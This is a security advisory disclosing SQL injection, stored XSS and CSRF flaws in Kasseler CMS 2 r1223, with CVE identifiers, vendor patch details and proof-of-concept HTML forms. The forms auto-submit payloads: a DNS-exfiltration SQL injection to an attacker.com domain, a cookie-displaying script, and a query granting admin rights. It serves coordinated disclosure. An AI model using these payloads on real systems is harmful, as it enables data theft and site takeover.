Advisory ID: HTB23158
Product: Kasseler CMS
Vendor: Kasseler CMS
Vulnerable Version(s): 2 r1223 and probably prior
Tested Version: 2 r1223
Vendor Notification: May 29, 2013=20
Vendor Patch: June 28, 2013=20
Public Disclosure: July 3, 2013=20
Vulnerability Type: SQL Injection [CWE-89], Cross-Site Scripting [CWE-79], =
Cross-Site Request Forgery [CWE-352]
CVE References: CVE-2013-3727, CVE-2013-3728, CVE-2013-3729
Risk Level: Medium=20
CVSSv2 Base Scores: 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P), 4 (AV:N/AC:L/Au:S/C:N=
/I:P/A:N), 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://w=
ww.htbridge.com/advisory/ )=20
---------------------------------------------------------------------------=
--------------------
Advisory Details:
High-Tech Bridge Security Research Lab discovered multiple vulnerabilities =
in Kasseler CMS, which can be exploited to perform SQL injection, Cross-Sit=
e Scripting (XSS) and Cross-Site Request Forgery (CSRF) attacks and comprom=
ise vulnerable application.
1) SQL Injection in Kasseler CMS: CVE-2013-3727
The vulnerability exists due to insufficient validation of "groups" HTTP PO=
ST parameter passed to "/admin.php" script. A remote authenticated administ=
rator can execute arbitrary SQL commands in application's database.
This vulnerability could also be exploited by a remote non-authenticated at=
tacker via CSRF vector, since the application is prone to Cross-Site Reques=
t Forgery (CSRF) attacks. In order to do so an attacker should trick logged=
-in administrator to visit a webpage with CSRF exploit.
Basic CSRF exploit code below is based on DNS Exfiltration technique and ma=
y be used if the database of the vulnerable application is hosted on a Wind=
ows platform. It will send a DNS request demanding IP addess for `version()=
` (or any other sensetive output from the database) subdomain of ".attacker=
=2Ecom" (a domain name, DNS server of which is controlled by the attacker):
<form action=3D"http://[host]/admin.php?module=3Dsendmail&do=3Dsend " metho=
d=3D"post" name=3D"main">
<input type=3D"hidden" name=3D"title" value=3D"1">
<input type=3D"hidden" name=3D"message" value=3D"1">
<input type=3D"hidden" name=3D"attache_page" value=3D"1">
<input type=3D"hidden" name=3D"groups[]" value=3D"123) OR 1=3D(select loa=
d_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(1=
16),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR=
(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CH=
AR(97),CHAR(114)))) -- ">
<input type=3D"hidden" name=3D"" value=3D"">
<input type=3D"hidden" name=3D"" value=3D"">
<input type=3D"submit" id=3D"btn">
</form>
<script>
document.main.submit();
</script>
2) Stored Cross-Site Scripting (XSS) in Kasseler CMS: CVE-2013-3728
The vulnerability exists due to insufficient filtration of "cat" HTTP POST =
parameter passed to "/admin.php" script. A remote attacker with privileges =
to create categories can permanently inject arbitrary HTML and script code =
into application database that will be executed in browser of every website=
visitor.=20
The following PoC code displays user's cookies using JavaScript 'alert()' f=
unction:
<form action=3D"http://[host]/admin.php?module=3Dforum&do=3Dadmin_new_categ=
ory " method=3D"post" name=3D"main">
<input type=3D"hidden" name=3D"cat" value=3D"<script>alert(document.cooki=
e);</script>">
<input type=3D"submit" id=3D"btn">
</form>
<script>
document.main.submit();
</script>
3) =D0=A1ross-Site Request Forgery (CSRF) in Kasseler CMS: CVE-2013-3729
The vulnerability exists due to absence of CSRF protection mechanisms in th=
e entire application. A remote attacker can trick logged-in administrator t=
o visit a specially crafted webpage with CSRF exploit code. This will enabl=
e the attacker to execute arbitrary SQL queries in application's database a=
nd gain complete control over the application.
The following CSRF exploit code will grant administrative privileges to use=
r with ID=3D2:=20
<form action=3D"http://[host]/admin.php?module=3Ddatabase&do=3Dsql_query " =
method=3D"post" name=3D"main">
<input type=3D"hidden" name=3D"query" value=3D"UPDATE `kasseler`.`kassele=
r_users` SET `user_level` =3D '2', `user_group` =3D '1' WHERE `kasseler_use=
rs`.`uid` =3D2 LIMIT 1 ;">
<input type=3D"submit" id=3D"btn">
</form>
<script>
document.main.submit();
</script>
Registration is open by default, and the attacker can easily get his user I=
D user from the profile page:
http://[host]/index.php?module=3Daccount&do=3Duser&id=3D2=20
---------------------------------------------------------------------------=
--------------------
Solution:
Upgrade to Kasseler CMS 2 r1232.
More Information:
http://diff.kasseler-cms.net/svn.html
http://diff.kasseler-cms.net/svn/patches/1232.html
---------------------------------------------------------------------------=
--------------------
References:
[1] High-Tech Bridge Advisory HTB23158 - https://www.htbridge.com/advisory/=
HTB23158 - Multiple Vulnerabilities in Kasseler CMS.
[2] Kasseler CMS - http://www.kasseler-cms.net - Kasseler CMS is a high per=
formance content management system.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - in=
ternational in scope and free for public use, CVE=C2=AE is a dictionary of =
publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to =
developers and security practitioners, CWE is a formal list of software wea=
kness types.=20
---------------------------------------------------------------------------=
--------------------
Disclaimer: The information provided in this Advisory is provided "as is" a=
nd without any warranty of any kind. Details of this Advisory may be update=
d in order to provide as accurate information as possible. The latest versi=
on of the Advisory is available on web page [1] in the References.